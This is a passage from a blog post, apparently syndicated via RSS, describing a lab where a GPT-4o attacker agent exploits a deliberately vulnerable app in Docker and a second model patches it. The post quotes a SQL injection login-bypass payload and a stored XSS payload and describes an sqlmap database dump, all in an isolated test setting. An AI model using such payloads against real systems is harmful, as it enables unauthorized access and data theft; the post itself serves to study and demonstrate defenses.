&lt;tr&gt;
&lt;td&gt;SQL Injection — manual&lt;/td&gt;
&lt;td&gt;❌ Exploited&lt;/td&gt;
&lt;td&gt;✅ Blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SQL Injection — sqlmap&lt;/td&gt;
&lt;td&gt;❌ Full DB dumped&lt;/td&gt;
&lt;td&gt;✅ Not injectable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stored XSS&lt;/td&gt;
&lt;td&gt;❌ Script executed&lt;/td&gt;
&lt;td&gt;✅ Escaped to plain text&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Legitimate login&lt;/td&gt;
&lt;td&gt;✅ Works&lt;/td&gt;
&lt;td&gt;✅ Still works&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Phase 2: Fully Autonomous Closed-Loop
&lt;/h2&gt;

&lt;p&gt;Phase 1 proved the concept with manual handoffs between steps. Phase 2 eliminated them entirely.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;orchestrator.py&lt;/code&gt; connects both agents in a &lt;strong&gt;Closed-Loop Feedback System&lt;/strong&gt; — a self-healing security pipeline that runs start-to-finish with a single command: &lt;code&gt;python3 orchestrator.py&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Orchestrator] ──── launch ────► [Red Agent GPT-4o: Attack]
      │                                        │
  rebuild Docker                         generate report
      │                                        │
      ▼                                        ▼
[Docker Container] ◄── patch ── [Blue Agent gpt-5.2: Defense]
      │
  new container live
      │
      ▼
[Red Agent GPT-4o: Verification Mode]
  → receives patched source code
  → reasons about bypass possibilities
  → confirms: SECURE ✅
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The critical engineering decision in Phase 4:&lt;/strong&gt; Red Agent doesn't just re-run &lt;code&gt;attack.sh&lt;/code&gt;. It receives the actual patched Python source code and &lt;em&gt;reasons&lt;/em&gt; about whether its previous payloads could succeed against the new logic. This is code-level security analysis, not blind tool re-execution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Live Orchestrator Output
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🚀 Starting Joint Operations Room: Red Team vs Blue Team...
==================================================

🔥 [Phase 1] Launching Red Agent (GPT-4o)...
📝 Red Agent successfully generated attack report!

🛡️ [Phase 2] Orchestrator hands report to Blue Agent (gpt-5.2)...
🛠️ Blue Agent patched the code and rewrote app.py automatically!

🐳 [Phase 3] Orchestrator rebuilds Docker with patched code...
🔄 Container updated. Secure version now live.

🎯 [Phase 4] Calling Red Agent for verification audit...

==================================================
🏁 Final Verification Report:

1. SQL Injection:
   Patched: cur.execute("SELECT ... WHERE username=?", (user,))
   Payload: admin' OR '1'='1
   Result:  ❌ BLOCKED — Parameterized queries neutralize the injection.

2. Stored XSS:
   Patched: html.escape() + Content-Security-Policy: script-src 'self'
   Payload: &amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;
   Result:  ❌ BLOCKED — Rendered as &amp;amp;lt;script&amp;amp;gt;. CSP blocks inline JS.

System Status: SECURE 🛡️
==================================================
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why the CSP Header Is the Interesting Part
&lt;/h3&gt;

&lt;p&gt;Blue Agent applied &lt;strong&gt;Defense-in-Depth&lt;/strong&gt; without being explicitly asked:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Layer 1:&lt;/strong&gt; &lt;code&gt;html.escape()&lt;/code&gt; converts &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; → &lt;code&gt;&amp;amp;lt;script&amp;amp;gt;&lt;/code&gt; at the Python level&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 2:&lt;/strong&gt; &lt;code&gt;Content-Security-Policy: script-src 'self'&lt;/code&gt; tells the browser to refuse any inline JavaScript, even if encoding somehow fails&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both layers must fail simultaneously for XSS to succeed. The model reasoned about this independently — it wasn't in the prompt.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Complete Timeline
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;18:36:58  🔵 gpt-5.2 builds app → Docker starts              ~15s
18:37:06  🔴 GPT-4o begins attack
          ├── nmap: Werkzeug 3.1.8 / Python 3.11.15          6.38s
          ├── SQLi: login bypassed on first payload           &amp;lt;1s
          ├── sqlmap: 3 injection types, full DB dump         10s
          └── XSS: payload stored and reflected               &amp;lt;1s
                                                    ──────────────
                                                    70s total
                                                    100 HTTP reqs

18:37:16  🤖 GPT-4o analyzes findings                1 call · 4,667 tokens
          🔵 gpt-5.2 patches app.py                  1 call · 2,561 tokens
          🐳 Docker rebuild                           ~20s (cached layers)

19:44:16  🔴 GPT-4o re-tests patched app             3s — all blocked

──────────────────────────────────────────────────────────────────
⏱️  Full cycle, start to finish:  &amp;lt; 2 minutes
💰  Total Azure OpenAI cost:      ~$0.08
👤  Human intervention:           zero
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  What This Actually Means
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Speed is the real shift.&lt;/strong&gt;&lt;br&gt;
What traditionally takes days — Red Team engagement, developer reads report, writes fix, gets it reviewed, deploys — happened in under two minutes. Not because AI is smarter than a human security engineer. Because it doesn't stop, doesn't need context-switching, and doesn't wait for a Slack reply.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Two models beat one.&lt;/strong&gt;&lt;br&gt;
GPT-4o on offense and gpt-5.2 on defense created genuine asymmetry. The experiment would have been less honest — and less interesting — with a single model playing both sides.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ditch the framework when it fights you.&lt;/strong&gt;&lt;br&gt;
AutoGen looked good on paper. When its bundled &lt;code&gt;openai&lt;/code&gt; v0.x clashed with our &lt;code&gt;openai&lt;/code&gt; v1.x, we spent zero time debugging it and called the API directly. Sometimes the abstraction isn't worth it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AI doesn't invent, it compresses.&lt;/strong&gt;&lt;br&gt;
SQL Injection is in OWASP Top 10. sqlmap is public. Parameterized queries are documented everywhere. What AI did here was collapse the time between &lt;em&gt;knowing&lt;/em&gt; and &lt;em&gt;doing&lt;/em&gt; — from days to seconds.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The real implication.&lt;/strong&gt;&lt;br&gt;
If an attacker can automate a full recon-exploit-report cycle in 70 seconds for $0.05, the defender's response window shrinks to something only automation can match. This experiment is a small demonstration of that pressure.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;[ ] Add CSRF and IDOR to the target app and repeat&lt;/li&gt;
&lt;li&gt;[ ] Test whether Red Agent can find vulnerabilities it wasn't told about&lt;/li&gt;
&lt;li&gt;[ ] Pit GPT-4o vs gpt-5.2 in both roles and compare outcomes&lt;/li&gt;
&lt;li&gt;[ ] Build a real-time terminal dashboard for the orchestration loop&lt;/li&gt;
&lt;li&gt;[ ] Extend to DAST scanning with OWASP ZAP&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Full source code and setup instructions: &lt;a href="https://github.com/" rel="noopener noreferrer"&gt;https://github.com/AbdaullahAG/autonomous-ai-red-blue-lab&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;All tests conducted in a completely isolated VM environment. Never apply these techniques to systems without explicit written permission.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>python</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
